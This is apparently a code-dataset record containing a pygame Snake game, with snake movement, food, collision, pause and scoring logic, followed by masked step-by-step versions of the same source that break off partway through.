                    running = False
            if not pause_game:
                try:
                    self.play()
                except Exception:
                    # play() raised on self-collision: show game over,
                    # pause, and reset state for the next round.
                    self.show_game_over()
                    pause_game = True
                    self.reset_game()
            clock.tick(60)  # cap the frame rate at 60 FPS
# Entry point: construct the game and hand control to its main loop.
if __name__ == '__main__':
    game = Game()
    game.run()
<|reserved_special_token_1|>
from typing import Sized
import pygame
import time
from pygame.locals import *
import random
SIZE = 20  # side length of one grid cell / sprite, in pixels
BACKGROUND = (45, 34, 44)  # RGB window fill colour
W = 800  # window width in pixels
H = 400  # window height in pixels
SCREEN = (W, H)  # pygame display-mode size
class Snake:
    """The player's snake: parallel snake_x / snake_y lists hold the
    SIZE-aligned position of every segment, index 0 being the head."""

    def __init__(self, parent_screen, length):
        self.parent_screen = parent_screen
        self.length = length
        self.snake = pygame.image.load(
            "resources/snake.png").convert()  # segment sprite
        self.snake_x = [W//2]*length  # every segment starts at the centre
        self.snake_y = [H//2]*length
        self.direction = "left"  # initial travel direction

    def increase_length(self):
        """Grow the snake by one segment.

        The (0, 0) placeholder appended here is overwritten on the very
        next move(), so its value is never visible.
        """
        self.length += 1
        self.snake_x.append(0)
        self.snake_y.append(0)

    def draw(self):
        """Blit every segment onto the parent surface and flip the display."""
        for i in range(self.length):
            self.parent_screen.blit(
                self.snake, (self.snake_x[i], self.snake_y[i]))
        pygame.display.flip()

    def move(self):
        """Advance one step: each body segment takes its predecessor's
        position, then the head moves one cell in the current direction."""
        # Walk back-to-front so positions shift without clobbering.
        for i in range(self.length-1, 0, -1):  # reverse for loop
            self.snake_x[i] = self.snake_x[i-1]
            self.snake_y[i] = self.snake_y[i-1]

        # Step the head one grid cell in the current direction.
        if self.direction == 'up':
            self.snake_y[0] -= SIZE
        if self.direction == 'down':
            self.snake_y[0] += SIZE
        if self.direction == 'right':
            self.snake_x[0] += SIZE
        if self.direction == 'left':
            self.snake_x[0] -= SIZE
        self.draw()

    def move_up(self):
        self.direction = 'up'

    def move_down(self):
        self.direction = 'down'

    def move_right(self):
        self.direction = 'right'

    def move_left(self):
        self.direction = 'left'
# Apple class
class Food:
    """A food item drawn at a random SIZE-aligned grid cell; eating it
    grows the snake."""

    def __init__(self, parent_screen):
        self.parent_screen = parent_screen
        # Two alternative sprites; draw() picks one at random each frame.
        self.food1 = pygame.image.load(
            "resources/food.png").convert()
        self.food2 = pygame.image.load(
            "resources/snake1.png").convert()
        self.food_x = SIZE*3  # initial position
        self.food_y = SIZE*2

    def draw(self):
        """Blit one of the food sprites (chosen at random) and flip."""
        seq = [self.food1, self.food2]
        self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))
        pygame.display.flip()

    def move(self):
        """Teleport the food to a random cell on the SIZE grid."""
        self.food_x = random.randint(0, W//SIZE - 1) * SIZE
        self.food_y = random.randint(0, H//SIZE - 1) * SIZE
class Game:
    """Top-level game object: owns the pygame window, the snake, the food,
    the audio, and the main event loop."""

    def __init__(self):
        pygame.init()
        pygame.display.set_caption("Snake Game")
        self.surface = pygame.display.set_mode(SCREEN)
        self.surface.fill(BACKGROUND)
        self.snake = Snake(self.surface, 3)  # start with 3 segments
        self.snake.draw()
        self.food = Food(self.surface)
        self.food.draw()
        pygame.mixer.init()
        self.background_music()

    def is_collision(self, x1, y1, x2, y2):
        """Return True when point (x1, y1) lies inside the SIZE x SIZE cell
        anchored at (x2, y2).

        The original fell through and returned None (instead of False) when
        x1 was outside the cell; a single boolean expression always returns
        a proper bool.
        """
        return x2 <= x1 < x2 + SIZE and y2 <= y1 < y2 + SIZE

    def play_sound(self, sound_location):
        """Play a short one-shot sound effect from the given file path."""
        sound = pygame.mixer.Sound(sound_location)
        pygame.mixer.Sound.play(sound)

    def background_music(self):
        """Start the background track, looping forever (-1)."""
        pygame.mixer.music.load("resources/b_music1.mp3")
        pygame.mixer.music.play(-1)

    def render_background(self):
        """Paint the background image over the whole window."""
        bg = pygame.image.load("resources/background.jpg")
        self.surface.blit(bg, (0, 0))

    def play(self):
        """Advance the game by one frame: move and draw everything, then
        handle food and self-collisions.

        Raises:
            RuntimeError: on self-collision; run() catches this to show
                the game-over screen.
        """
        self.render_background()
        self.snake.move()
        self.food.draw()
        self.display_score()
        self.screen_msgs()
        pygame.display.flip()
        # Head over the food: relocate the food and grow the snake.
        if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],
                             self.food.food_x, self.food.food_y):
            self.food.move()
            self.snake.increase_length()
            self.play_sound("resources/ding.mp3")
        # Head over any body segment ends the game.  Segment 1 always trails
        # directly behind the head, so start checking at index 2.
        for i in range(2, self.snake.length):
            if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],
                                 self.snake.snake_x[i], self.snake.snake_y[i]):
                self.play_sound("resources/fail_buzz.mp3")
                # Raising a plain string is itself a TypeError in Python 3;
                # raise a real exception so the intent is explicit.
                raise RuntimeError("Game Over")
        self.touch_border_action()

    def pause_msg(self):
        """Overlay the pause banner and the resume hint."""
        font = pygame.font.SysFont('arial', 20)
        font1 = pygame.font.SysFont('Rockwell', 80)
        line1 = font1.render("<Paused>", True, (200, 200, 200))
        line2 = font.render("Press <UP, DOWN, LEFT, RIGHT> To Resume",
                            True, (255, 255, 0))
        self.surface.blit(line1, (W // 4 + 20, H // 3))
        self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))
        pygame.display.flip()

    def show_game_over(self):
        """Draw the game-over screen with the final score and key hints,
        then stop the background music."""
        self.render_background()
        font = pygame.font.SysFont('Cooper Black', 30)
        font1 = pygame.font.SysFont('Cooper Black', 60)
        line1 = font1.render("GAME OVER !!", True, (200, 0, 0))
        line1B = font.render(f"<<Score : {self.snake.length - 3}>>", True,
                             (10, 255, 10))
        line2 = font.render("Press <UP, DOWN, LEFT, RIGHT> To Play Again",
                            True, (200, 200, 200))
        line3 = font.render("Press ESC to EXIT!", True, (255, 200, 0))
        self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))
        self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))
        self.surface.blit(line2, (45, H // 3 + 110))
        self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))
        pygame.display.flip()
        # Rewind so the music restarts from the top on the next round.
        pygame.mixer.music.rewind()
        pygame.mixer.music.pause()

    def touch_border_action(self):
        """Wrap the snake's head to the opposite edge when it leaves the
        window, so it re-enters instead of vanishing."""
        # >= / < instead of exact equality: the head still wraps even if it
        # ever overshoots the edge by more than one step.
        if self.snake.snake_x[0] >= W:
            self.snake.snake_x[0] = 0
        elif self.snake.snake_x[0] < 0:
            self.snake.snake_x[0] = W
        if self.snake.snake_y[0] >= H:
            self.snake.snake_y[0] = 0
        elif self.snake.snake_y[0] < 0:
            self.snake.snake_y[0] = H

    def reset_game(self):
        """Start a fresh round with a new snake and food."""
        self.snake = Snake(self.surface, 3)
        self.food = Food(self.surface)

    def display_score(self):
        """Render the current score (food eaten) near the top centre."""
        font = pygame.font.SysFont('Algerian', 30)
        score = font.render(f"[Score : {self.snake.length - 3}]", True,
                            (0, 255, 255))
        self.surface.blit(score, (W // 2 - 70, 5))

    def screen_msgs(self):
        """Show the pause/exit key hints along the bottom edge."""
        font = pygame.font.SysFont('aharoni', 16)
        msgs1 = font.render("[SPACE] to Pause", True, (200, 204, 255))
        msgs2 = font.render("[ESC] to EXIT", True, (200, 204, 255))
        self.surface.blit(msgs1, (W - 100, H - 20))
        self.surface.blit(msgs2, (10, H - 20))

    def run(self):
        """Main loop: dispatch keyboard/window events, advance frames at
        60 FPS, and handle the pause and game-over states."""
        clock = pygame.time.Clock()
        running = True      # cleared by ESC or the window close button
        pause_game = False  # True while the pause / game-over screen shows
        while running:
            for event in pygame.event.get():
                if event.type == KEYDOWN:
                    if event.key == K_ESCAPE:
                        running = False
                    if event.key == K_SPACE:
                        pygame.mixer.music.pause()
                        self.pause_msg()
                        pause_game = True
                    # Any arrow key both steers the snake and resumes play.
                    if event.key == K_UP:
                        self.snake.move_up()
                        pause_game = False
                        pygame.mixer.music.unpause()
                    if event.key == K_DOWN:
                        self.snake.move_down()
                        pause_game = False
                        pygame.mixer.music.unpause()
                    if event.key == K_LEFT:
                        self.snake.move_left()
                        pause_game = False
                        pygame.mixer.music.unpause()
                    if event.key == K_RIGHT:
                        self.snake.move_right()
                        pause_game = False
                        pygame.mixer.music.unpause()
                elif event.type == QUIT:
                    running = False
            if not pause_game:
                try:
                    self.play()
                except Exception:
                    # play() raised on self-collision: show game over,
                    # pause, and reset state for the next round.
                    self.show_game_over()
                    pause_game = True
                    self.reset_game()
            clock.tick(60)  # cap the frame rate at 60 FPS
# Entry point: construct the game and hand control to its main loop.
if __name__ == "__main__":
    game = Game()  # build the Game object
    game.run()
# auto-py-to-exe.exe  # run this command to convert the script to an .exe
|
flexible
|
{
"blob_id": "935853a4afdb50a4652e14913d0cdb251a84ea14",
"index": 6427,
"step-1": "<mask token>\n\n\nclass Food:\n <mask token>\n\n def draw(self):\n seq = [self.food1, self.food2]\n self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))\n pygame.display.flip()\n\n def move(self):\n self.food_x = random.randint(0, W // SIZE - 1) * SIZE\n self.food_y = random.randint(0, H // SIZE - 1) * SIZE\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n pygame.display.set_caption('Snake Game')\n self.surface = pygame.display.set_mode(SCREEN)\n self.surface.fill(BACKGROUND)\n self.snake = Snake(self.surface, 3)\n self.snake.draw()\n self.food = Food(self.surface)\n self.food.draw()\n pygame.mixer.init()\n self.background_music()\n\n def is_collision(self, x1, y1, x2, y2):\n if x1 >= x2 and x1 < x2 + SIZE:\n if y1 >= y2 and y1 < y2 + SIZE:\n return True\n else:\n return False\n\n def play_sound(self, sound_location):\n sound = pygame.mixer.Sound(sound_location)\n pygame.mixer.Sound.play(sound)\n\n def background_music(self):\n pygame.mixer.music.load('resources/b_music1.mp3')\n pygame.mixer.music.play(-1)\n\n def render_background(self):\n bg = pygame.image.load('resources/background.jpg')\n self.surface.blit(bg, (0, 0))\n\n def play(self):\n self.render_background()\n self.snake.move()\n self.food.draw()\n self.display_score()\n self.screen_msgs()\n pygame.display.flip()\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],\n self.food.food_x, self.food.food_y):\n self.food.move()\n self.snake.increase_length()\n self.play_sound('resources/ding.mp3')\n for i in range(2, self.snake.length):\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[\n 0], self.snake.snake_x[i], self.snake.snake_y[i]):\n self.play_sound('resources/fail_buzz.mp3')\n raise 'Game Over'\n self.touch_border_action()\n\n def pause_msg(self):\n font = pygame.font.SysFont('arial', 20)\n font1 = pygame.font.SysFont('Rockwell', 80)\n line1 = font1.render(f'<Paused>', True, (200, 200, 200))\n line2 = font.render(f'Press <UP, DOWN, 
LEFT, RIGHT> To Resume', \n True, (255, 255, 0))\n self.surface.blit(line1, (W // 4 + 20, H // 3))\n self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))\n pygame.display.flip()\n\n def show_game_over(self):\n self.render_background()\n font = pygame.font.SysFont('Cooper Black', 30)\n font1 = pygame.font.SysFont('Cooper Black', 60)\n line1 = font1.render(f'GAME OVER !!', True, (200, 0, 0))\n line1B = font.render(f'<<Score : {self.snake.length - 3}>>', True,\n (10, 255, 10))\n line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Play Again',\n True, (200, 200, 200))\n line3 = font.render(f'Press ESC to EXIT!', True, (255, 200, 0))\n self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))\n self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))\n self.surface.blit(line2, (45, H // 3 + 110))\n self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))\n pygame.display.flip()\n pygame.mixer.music.rewind()\n pygame.mixer.music.pause()\n\n def touch_border_action(self):\n if self.snake.snake_x[0] == W:\n self.snake.snake_x[0] = 0\n elif self.snake.snake_x[0] < 0:\n self.snake.snake_x[0] = W\n if self.snake.snake_y[0] == H:\n self.snake.snake_y[0] = 0\n elif self.snake.snake_y[0] < 0:\n self.snake.snake_y[0] = H\n\n def reset_game(self):\n self.snake = Snake(self.surface, 3)\n self.food = Food(self.surface)\n\n def display_score(self):\n font = pygame.font.SysFont('Algerian', 30)\n score = font.render(f'[Score : {self.snake.length - 3}]', True, (0,\n 255, 255))\n self.surface.blit(score, (W // 2 - 70, 5))\n\n def screen_msgs(self):\n font = pygame.font.SysFont('aharoni', 16)\n msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))\n msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))\n self.surface.blit(msgs1, (W - 100, H - 20))\n self.surface.blit(msgs2, (10, H - 20))\n\n def run(self):\n clock = pygame.time.Clock()\n running = True\n pause_game = False\n while running:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == 
K_ESCAPE:\n running = False\n if event.key == K_SPACE:\n pygame.mixer.music.pause()\n self.pause_msg()\n pause_game = True\n if event.key == K_UP:\n self.snake.move_up()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_DOWN:\n self.snake.move_down()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_LEFT:\n self.snake.move_left()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_RIGHT:\n self.snake.move_right()\n pause_game = False\n pygame.mixer.music.unpause()\n elif event.type == QUIT:\n running = False\n if not pause_game:\n try:\n self.play()\n except Exception as e:\n self.show_game_over()\n pause_game = True\n self.reset_game()\n clock.tick(60)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Snake:\n\n def __init__(self, parent_screen, length):\n self.parent_screen = parent_screen\n self.length = length\n self.snake = pygame.image.load('resources/snake.png').convert()\n self.snake_x = [W // 2] * length\n self.snake_y = [H // 2] * length\n self.direction = 'left'\n <mask token>\n\n def draw(self):\n for i in range(self.length):\n self.parent_screen.blit(self.snake, (self.snake_x[i], self.\n snake_y[i]))\n pygame.display.flip()\n\n def move(self):\n for i in range(self.length - 1, 0, -1):\n self.snake_x[i] = self.snake_x[i - 1]\n self.snake_y[i] = self.snake_y[i - 1]\n if self.direction == 'up':\n self.snake_y[0] -= SIZE\n if self.direction == 'down':\n self.snake_y[0] += SIZE\n if self.direction == 'right':\n self.snake_x[0] += SIZE\n if self.direction == 'left':\n self.snake_x[0] -= SIZE\n self.draw()\n\n def move_up(self):\n self.direction = 'up'\n\n def move_down(self):\n self.direction = 'down'\n\n def move_right(self):\n self.direction = 'right'\n\n def move_left(self):\n self.direction = 'left'\n\n\nclass Food:\n\n def __init__(self, parent_screen):\n self.parent_screen = parent_screen\n self.food1 = pygame.image.load('resources/food.png').convert()\n self.food2 = pygame.image.load('resources/snake1.png').convert()\n self.food_x = SIZE * 3\n self.food_y = SIZE * 2\n\n def draw(self):\n seq = [self.food1, self.food2]\n self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))\n pygame.display.flip()\n\n def move(self):\n self.food_x = random.randint(0, W // SIZE - 1) * SIZE\n self.food_y = random.randint(0, H // SIZE - 1) * SIZE\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n pygame.display.set_caption('Snake Game')\n self.surface = pygame.display.set_mode(SCREEN)\n self.surface.fill(BACKGROUND)\n self.snake = Snake(self.surface, 3)\n self.snake.draw()\n self.food = Food(self.surface)\n self.food.draw()\n pygame.mixer.init()\n self.background_music()\n\n def is_collision(self, x1, y1, x2, 
y2):\n if x1 >= x2 and x1 < x2 + SIZE:\n if y1 >= y2 and y1 < y2 + SIZE:\n return True\n else:\n return False\n\n def play_sound(self, sound_location):\n sound = pygame.mixer.Sound(sound_location)\n pygame.mixer.Sound.play(sound)\n\n def background_music(self):\n pygame.mixer.music.load('resources/b_music1.mp3')\n pygame.mixer.music.play(-1)\n\n def render_background(self):\n bg = pygame.image.load('resources/background.jpg')\n self.surface.blit(bg, (0, 0))\n\n def play(self):\n self.render_background()\n self.snake.move()\n self.food.draw()\n self.display_score()\n self.screen_msgs()\n pygame.display.flip()\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],\n self.food.food_x, self.food.food_y):\n self.food.move()\n self.snake.increase_length()\n self.play_sound('resources/ding.mp3')\n for i in range(2, self.snake.length):\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[\n 0], self.snake.snake_x[i], self.snake.snake_y[i]):\n self.play_sound('resources/fail_buzz.mp3')\n raise 'Game Over'\n self.touch_border_action()\n\n def pause_msg(self):\n font = pygame.font.SysFont('arial', 20)\n font1 = pygame.font.SysFont('Rockwell', 80)\n line1 = font1.render(f'<Paused>', True, (200, 200, 200))\n line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Resume', \n True, (255, 255, 0))\n self.surface.blit(line1, (W // 4 + 20, H // 3))\n self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))\n pygame.display.flip()\n\n def show_game_over(self):\n self.render_background()\n font = pygame.font.SysFont('Cooper Black', 30)\n font1 = pygame.font.SysFont('Cooper Black', 60)\n line1 = font1.render(f'GAME OVER !!', True, (200, 0, 0))\n line1B = font.render(f'<<Score : {self.snake.length - 3}>>', True,\n (10, 255, 10))\n line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Play Again',\n True, (200, 200, 200))\n line3 = font.render(f'Press ESC to EXIT!', True, (255, 200, 0))\n self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))\n 
self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))\n self.surface.blit(line2, (45, H // 3 + 110))\n self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))\n pygame.display.flip()\n pygame.mixer.music.rewind()\n pygame.mixer.music.pause()\n\n def touch_border_action(self):\n if self.snake.snake_x[0] == W:\n self.snake.snake_x[0] = 0\n elif self.snake.snake_x[0] < 0:\n self.snake.snake_x[0] = W\n if self.snake.snake_y[0] == H:\n self.snake.snake_y[0] = 0\n elif self.snake.snake_y[0] < 0:\n self.snake.snake_y[0] = H\n\n def reset_game(self):\n self.snake = Snake(self.surface, 3)\n self.food = Food(self.surface)\n\n def display_score(self):\n font = pygame.font.SysFont('Algerian', 30)\n score = font.render(f'[Score : {self.snake.length - 3}]', True, (0,\n 255, 255))\n self.surface.blit(score, (W // 2 - 70, 5))\n\n def screen_msgs(self):\n font = pygame.font.SysFont('aharoni', 16)\n msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))\n msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))\n self.surface.blit(msgs1, (W - 100, H - 20))\n self.surface.blit(msgs2, (10, H - 20))\n\n def run(self):\n clock = pygame.time.Clock()\n running = True\n pause_game = False\n while running:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n if event.key == K_SPACE:\n pygame.mixer.music.pause()\n self.pause_msg()\n pause_game = True\n if event.key == K_UP:\n self.snake.move_up()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_DOWN:\n self.snake.move_down()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_LEFT:\n self.snake.move_left()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_RIGHT:\n self.snake.move_right()\n pause_game = False\n pygame.mixer.music.unpause()\n elif event.type == QUIT:\n running = False\n if not pause_game:\n try:\n self.play()\n except Exception as e:\n self.show_game_over()\n pause_game = True\n 
self.reset_game()\n clock.tick(60)\n\n\n<mask token>\n",
"step-3": "<mask token>\nSIZE = 20\nBACKGROUND = 45, 34, 44\nW = 800\nH = 400\nSCREEN = W, H\n\n\nclass Snake:\n\n def __init__(self, parent_screen, length):\n self.parent_screen = parent_screen\n self.length = length\n self.snake = pygame.image.load('resources/snake.png').convert()\n self.snake_x = [W // 2] * length\n self.snake_y = [H // 2] * length\n self.direction = 'left'\n\n def increase_length(self):\n self.length += 1\n self.snake_x.append(0)\n self.snake_y.append(0)\n\n def draw(self):\n for i in range(self.length):\n self.parent_screen.blit(self.snake, (self.snake_x[i], self.\n snake_y[i]))\n pygame.display.flip()\n\n def move(self):\n for i in range(self.length - 1, 0, -1):\n self.snake_x[i] = self.snake_x[i - 1]\n self.snake_y[i] = self.snake_y[i - 1]\n if self.direction == 'up':\n self.snake_y[0] -= SIZE\n if self.direction == 'down':\n self.snake_y[0] += SIZE\n if self.direction == 'right':\n self.snake_x[0] += SIZE\n if self.direction == 'left':\n self.snake_x[0] -= SIZE\n self.draw()\n\n def move_up(self):\n self.direction = 'up'\n\n def move_down(self):\n self.direction = 'down'\n\n def move_right(self):\n self.direction = 'right'\n\n def move_left(self):\n self.direction = 'left'\n\n\nclass Food:\n\n def __init__(self, parent_screen):\n self.parent_screen = parent_screen\n self.food1 = pygame.image.load('resources/food.png').convert()\n self.food2 = pygame.image.load('resources/snake1.png').convert()\n self.food_x = SIZE * 3\n self.food_y = SIZE * 2\n\n def draw(self):\n seq = [self.food1, self.food2]\n self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))\n pygame.display.flip()\n\n def move(self):\n self.food_x = random.randint(0, W // SIZE - 1) * SIZE\n self.food_y = random.randint(0, H // SIZE - 1) * SIZE\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n pygame.display.set_caption('Snake Game')\n self.surface = pygame.display.set_mode(SCREEN)\n self.surface.fill(BACKGROUND)\n self.snake = Snake(self.surface, 3)\n 
self.snake.draw()\n self.food = Food(self.surface)\n self.food.draw()\n pygame.mixer.init()\n self.background_music()\n\n def is_collision(self, x1, y1, x2, y2):\n if x1 >= x2 and x1 < x2 + SIZE:\n if y1 >= y2 and y1 < y2 + SIZE:\n return True\n else:\n return False\n\n def play_sound(self, sound_location):\n sound = pygame.mixer.Sound(sound_location)\n pygame.mixer.Sound.play(sound)\n\n def background_music(self):\n pygame.mixer.music.load('resources/b_music1.mp3')\n pygame.mixer.music.play(-1)\n\n def render_background(self):\n bg = pygame.image.load('resources/background.jpg')\n self.surface.blit(bg, (0, 0))\n\n def play(self):\n self.render_background()\n self.snake.move()\n self.food.draw()\n self.display_score()\n self.screen_msgs()\n pygame.display.flip()\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],\n self.food.food_x, self.food.food_y):\n self.food.move()\n self.snake.increase_length()\n self.play_sound('resources/ding.mp3')\n for i in range(2, self.snake.length):\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[\n 0], self.snake.snake_x[i], self.snake.snake_y[i]):\n self.play_sound('resources/fail_buzz.mp3')\n raise 'Game Over'\n self.touch_border_action()\n\n def pause_msg(self):\n font = pygame.font.SysFont('arial', 20)\n font1 = pygame.font.SysFont('Rockwell', 80)\n line1 = font1.render(f'<Paused>', True, (200, 200, 200))\n line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Resume', \n True, (255, 255, 0))\n self.surface.blit(line1, (W // 4 + 20, H // 3))\n self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))\n pygame.display.flip()\n\n def show_game_over(self):\n self.render_background()\n font = pygame.font.SysFont('Cooper Black', 30)\n font1 = pygame.font.SysFont('Cooper Black', 60)\n line1 = font1.render(f'GAME OVER !!', True, (200, 0, 0))\n line1B = font.render(f'<<Score : {self.snake.length - 3}>>', True,\n (10, 255, 10))\n line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Play Again',\n True, 
(200, 200, 200))\n line3 = font.render(f'Press ESC to EXIT!', True, (255, 200, 0))\n self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))\n self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))\n self.surface.blit(line2, (45, H // 3 + 110))\n self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))\n pygame.display.flip()\n pygame.mixer.music.rewind()\n pygame.mixer.music.pause()\n\n def touch_border_action(self):\n if self.snake.snake_x[0] == W:\n self.snake.snake_x[0] = 0\n elif self.snake.snake_x[0] < 0:\n self.snake.snake_x[0] = W\n if self.snake.snake_y[0] == H:\n self.snake.snake_y[0] = 0\n elif self.snake.snake_y[0] < 0:\n self.snake.snake_y[0] = H\n\n def reset_game(self):\n self.snake = Snake(self.surface, 3)\n self.food = Food(self.surface)\n\n def display_score(self):\n font = pygame.font.SysFont('Algerian', 30)\n score = font.render(f'[Score : {self.snake.length - 3}]', True, (0,\n 255, 255))\n self.surface.blit(score, (W // 2 - 70, 5))\n\n def screen_msgs(self):\n font = pygame.font.SysFont('aharoni', 16)\n msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))\n msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))\n self.surface.blit(msgs1, (W - 100, H - 20))\n self.surface.blit(msgs2, (10, H - 20))\n\n def run(self):\n clock = pygame.time.Clock()\n running = True\n pause_game = False\n while running:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n if event.key == K_SPACE:\n pygame.mixer.music.pause()\n self.pause_msg()\n pause_game = True\n if event.key == K_UP:\n self.snake.move_up()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_DOWN:\n self.snake.move_down()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_LEFT:\n self.snake.move_left()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_RIGHT:\n self.snake.move_right()\n pause_game = False\n pygame.mixer.music.unpause()\n elif event.type == QUIT:\n 
running = False\n if not pause_game:\n try:\n self.play()\n except Exception as e:\n self.show_game_over()\n pause_game = True\n self.reset_game()\n clock.tick(60)\n\n\nif __name__ == '__main__':\n game = Game()\n game.run()\n",
"step-4": "from typing import Sized\nimport pygame\nimport time\nfrom pygame.locals import *\nimport random\nSIZE = 20\nBACKGROUND = 45, 34, 44\nW = 800\nH = 400\nSCREEN = W, H\n\n\nclass Snake:\n\n def __init__(self, parent_screen, length):\n self.parent_screen = parent_screen\n self.length = length\n self.snake = pygame.image.load('resources/snake.png').convert()\n self.snake_x = [W // 2] * length\n self.snake_y = [H // 2] * length\n self.direction = 'left'\n\n def increase_length(self):\n self.length += 1\n self.snake_x.append(0)\n self.snake_y.append(0)\n\n def draw(self):\n for i in range(self.length):\n self.parent_screen.blit(self.snake, (self.snake_x[i], self.\n snake_y[i]))\n pygame.display.flip()\n\n def move(self):\n for i in range(self.length - 1, 0, -1):\n self.snake_x[i] = self.snake_x[i - 1]\n self.snake_y[i] = self.snake_y[i - 1]\n if self.direction == 'up':\n self.snake_y[0] -= SIZE\n if self.direction == 'down':\n self.snake_y[0] += SIZE\n if self.direction == 'right':\n self.snake_x[0] += SIZE\n if self.direction == 'left':\n self.snake_x[0] -= SIZE\n self.draw()\n\n def move_up(self):\n self.direction = 'up'\n\n def move_down(self):\n self.direction = 'down'\n\n def move_right(self):\n self.direction = 'right'\n\n def move_left(self):\n self.direction = 'left'\n\n\nclass Food:\n\n def __init__(self, parent_screen):\n self.parent_screen = parent_screen\n self.food1 = pygame.image.load('resources/food.png').convert()\n self.food2 = pygame.image.load('resources/snake1.png').convert()\n self.food_x = SIZE * 3\n self.food_y = SIZE * 2\n\n def draw(self):\n seq = [self.food1, self.food2]\n self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))\n pygame.display.flip()\n\n def move(self):\n self.food_x = random.randint(0, W // SIZE - 1) * SIZE\n self.food_y = random.randint(0, H // SIZE - 1) * SIZE\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n pygame.display.set_caption('Snake Game')\n self.surface = 
pygame.display.set_mode(SCREEN)\n self.surface.fill(BACKGROUND)\n self.snake = Snake(self.surface, 3)\n self.snake.draw()\n self.food = Food(self.surface)\n self.food.draw()\n pygame.mixer.init()\n self.background_music()\n\n def is_collision(self, x1, y1, x2, y2):\n if x1 >= x2 and x1 < x2 + SIZE:\n if y1 >= y2 and y1 < y2 + SIZE:\n return True\n else:\n return False\n\n def play_sound(self, sound_location):\n sound = pygame.mixer.Sound(sound_location)\n pygame.mixer.Sound.play(sound)\n\n def background_music(self):\n pygame.mixer.music.load('resources/b_music1.mp3')\n pygame.mixer.music.play(-1)\n\n def render_background(self):\n bg = pygame.image.load('resources/background.jpg')\n self.surface.blit(bg, (0, 0))\n\n def play(self):\n self.render_background()\n self.snake.move()\n self.food.draw()\n self.display_score()\n self.screen_msgs()\n pygame.display.flip()\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],\n self.food.food_x, self.food.food_y):\n self.food.move()\n self.snake.increase_length()\n self.play_sound('resources/ding.mp3')\n for i in range(2, self.snake.length):\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[\n 0], self.snake.snake_x[i], self.snake.snake_y[i]):\n self.play_sound('resources/fail_buzz.mp3')\n raise 'Game Over'\n self.touch_border_action()\n\n def pause_msg(self):\n font = pygame.font.SysFont('arial', 20)\n font1 = pygame.font.SysFont('Rockwell', 80)\n line1 = font1.render(f'<Paused>', True, (200, 200, 200))\n line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Resume', \n True, (255, 255, 0))\n self.surface.blit(line1, (W // 4 + 20, H // 3))\n self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))\n pygame.display.flip()\n\n def show_game_over(self):\n self.render_background()\n font = pygame.font.SysFont('Cooper Black', 30)\n font1 = pygame.font.SysFont('Cooper Black', 60)\n line1 = font1.render(f'GAME OVER !!', True, (200, 0, 0))\n line1B = font.render(f'<<Score : {self.snake.length - 3}>>', 
